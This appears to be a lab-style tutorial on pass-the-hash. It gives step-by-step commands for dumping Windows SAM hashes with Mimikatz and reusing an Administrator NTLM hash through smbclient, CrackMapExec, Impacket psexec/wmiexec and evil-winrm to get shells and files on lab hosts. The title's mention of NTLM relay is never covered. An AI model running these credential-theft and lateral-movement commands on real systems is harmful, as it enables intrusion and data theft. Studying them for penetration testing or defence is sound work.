Pass-the-Hash & NTLM Relay Techniques

Published on June 25, 2025


When NTLM hashes cannot be cracked quickly, we can still leverage them to authenticate—without knowing the plaintext—using pass-the-hash (PtH) and related techniques. Below we show every command and explain each method.

1. Extract Administrator NTLM Hash (Mimikatz)

On FILES01 (192.168.50.211), run PowerShell as Administrator and launch Mimikatz from C:\tools:

PS C:\Windows\system32> cd C:\tools
PS C:\tools> .\mimikatz.exe

Explanation: Changes into the tools folder and starts Mimikatz’s interactive shell.

Enable debug privilege and elevate to SYSTEM, then dump SAM hashes:

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

Explanation:
  • privilege::debug enables SeDebugPrivilege so Mimikatz can read LSASS memory.
  • token::elevate impersonates the SYSTEM account.
  • lsadump::sam extracts NTLM hashes from the locked SAM database.

Copy the Administrator hash (e.g., 7a38310ea6f0027ee955abed1762964b) and save on Kali:

kali@kali:~/passwordattacks$ echo "7a38310ea6f0027ee955abed1762964b" > administrator.hash

Explanation: Stores the hash in a file for use with other tools.

2. SMB Access with smbclient

Use the NTLM hash to authenticate to an SMB share:

kali@kali:~$ smbclient \\\\192.168.50.212\\secrets \
  -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

Explanation: the doubled backslashes escape the UNC path \\192.168.50.212\secrets for the shell; -U specifies the username; --pw-nt-hash supplies the NTLM hash in place of a password.

After connection:

smb: \> dir
smb: \> get secrets.txt

Explanation: Lists and downloads files from the share.

3. SMB Access with CrackMapExec

kali@kali:~$ crackmapexec smb 192.168.50.212 \
  -u Administrator -H 7a38310ea6f0027ee955abed1762964b

Explanation: the smb module of crackmapexec targets SMB; -u gives the username and -H the NTLM hash. The tool automates share enumeration and can also upload and download files.

4. Remote Code Execution with impacket-psexec

kali@kali:~$ impacket-psexec \
  -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b \
  Administrator@192.168.50.212

Explanation: -hashes takes the LM:NT format; the LM half is set to 32 zeros when no LM hash is in use. psexec authenticates and, by default, executes cmd.exe as SYSTEM.

5. Remote Code Execution with impacket-wmiexec

kali@kali:~$ impacket-wmiexec \
  -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b \
  Administrator@192.168.50.212

Explanation: similar to psexec but executes through WMI; the resulting shell runs as the specified user (Administrator) rather than SYSTEM.

6. Pass-the-Hash with Mimikatz

Within Mimikatz’s shell on FILES01, use sekurlsa::pth to spawn a process with the hash:

mimikatz # sekurlsa::pth /user:Administrator \
  /domain:FILES02 /ntlm:7a38310ea6f0027ee955abed1762964b \
  /run:cmd.exe

Explanation: injects the NTLM hash into a new cmd.exe process token; you then interact with a shell running as Administrator.

7. RDP or WinRM via Hash (Other Protocols)

You can also authenticate over RDP or WinRM:

kali@kali:~$ evil-winrm \
  -i 192.168.50.212 -u Administrator \
  -H 7a38310ea6f0027ee955abed1762964b

Explanation: authenticates over WinRM using the NTLM hash; the WinRM service must be enabled on the target and reachable through its firewall.

Key Points

  • PtH works because NTLM hashes are unsalted and static: the hash itself is the credential.
  • The built-in local Administrator account is exempt from UAC remote restrictions; other local administrators can only be used remotely if the host is configured to allow it.
  • Multiple tools support PtH: smbclient, CrackMapExec (CME), Impacket, Mimikatz, Evil-WinRM.
  • Mimikatz requires local Administrator rights plus SeDebugPrivilege; use privilege::debug and token::elevate.
